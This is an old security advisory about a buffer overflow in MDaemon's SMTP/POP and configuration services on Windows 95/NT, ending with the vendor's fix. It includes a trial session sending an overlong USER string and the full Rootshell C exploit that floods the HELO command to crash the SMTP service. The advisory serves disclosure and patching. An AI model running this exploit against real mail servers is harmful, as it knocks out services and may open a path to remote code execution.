COMMAND

    MDaemon

SYSTEMS AFFECTED

    Win95, NT

PROBLEM

    Alvaro Martinez  Echevarria found  following.   There's a security
    problem in the SMTP/POP/WebPop  MDaemon software they provide  for
    evaluation  (and  probably  also  in  the  commercial version they
    sell), that lets you kill SMTP and POP services provided that  you
    can connect to a sort  of configuration port the programs  use (in
    the configuration tested  the port was  N+1, for N  being the port
    used by WebPop).

    To brought  the SMTP/POP  services down  it is  easy: connect to a
    port whose greeting says  "+OK xxx.xxx MDCONFIG Interface  Ready",
    and after some trial and error try this:

        VERS 3.0
        +OK MDConfig v3.0 acceptable.
        USER aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[...]

    The "a" here needs  to be repeated a  lot of times, say  2000. And
    after that, voila: "Connection closed by foreign host" and let die
    the SMTP  and POP  services.   As you  should know,  this same bug
    could be used in  a more clever way  to execute arbitrary code  in
    any server that  is using your  MDaemon software.   rootshell guys
    released their MDaemon exploit too.

    /*
     * MDaemon SMTP server for Windows buffer overflow exploit
     *
     * Tested on MDaemon 2.71 SP1
     *
     * http://www.rootshell.com/
     *
     * Released 3/10/98
     *
     * (C) 1998 Rootshell All Rights Reserved
     *
     * For educational use only.  Distribute freely.
     *
     * Note: This exploit will also crash the Microsoft Exchange 5.0 SMTP mail
     *       connector if SP2 has NOT been installed.
     *
     * Danger!
     *
     * A malicous user could use this bug to execute arbitrary code on the
     * remote system.
     *
     */

    #include <stdio.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <string.h>
    #include <stdlib.h>
    #include <unistd.h>

    void main(int argc, char *argv[])
    {
      struct sockaddr_in sin;
      struct hostent *hp;
      char *buffer;
      int sock, i;

      if (argc != 2) {
        printf("usage: %s <smtp server>\n", argv[0]);
        exit(1);
      }
      hp = gethostbyname(argv[1]);
      if (hp==NULL) {
        printf("Unknown host: %s\n",argv[1]);
        exit(1);
      }
      bzero((char*) &sin, sizeof(sin));
      bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
      sin.sin_family = hp->h_addrtype;
      sin.sin_port = htons(25);
      sock = socket(AF_INET, SOCK_STREAM, 0);
      connect(sock,(struct sockaddr *) &sin, sizeof(sin));
      buffer = (char *)malloc(10000);
      sprintf(buffer, "HELO ");
      for (i = 0; i<4096; i++)
        strcat(buffer, "x");
      strcat(buffer, "\r\n");
      write(sock, &buffer[0], strlen(buffer));
      close(sock);
      free(buffer);
    }

    Rootshell Note: The config manager appears to run on port 8081 and
    is configurable.   In the version  that we tested  (2.71 SP1) this
    buffer overflow did  not exist in  the remote config  manager, and
    required a remote version of 3.7 and not 3.0.

SOLUTION

    This  problem  is  fixed  in  so  called  "Service/Update Pack 2".
    Service/Update Pack 2 for Mdaemon 2.7 can be obtained at:

        http://www.mdaemon.com

    Also, this  is fixed  in the  2.75 beta  available now for whoever
    wants it and will have this fix generally available on site above.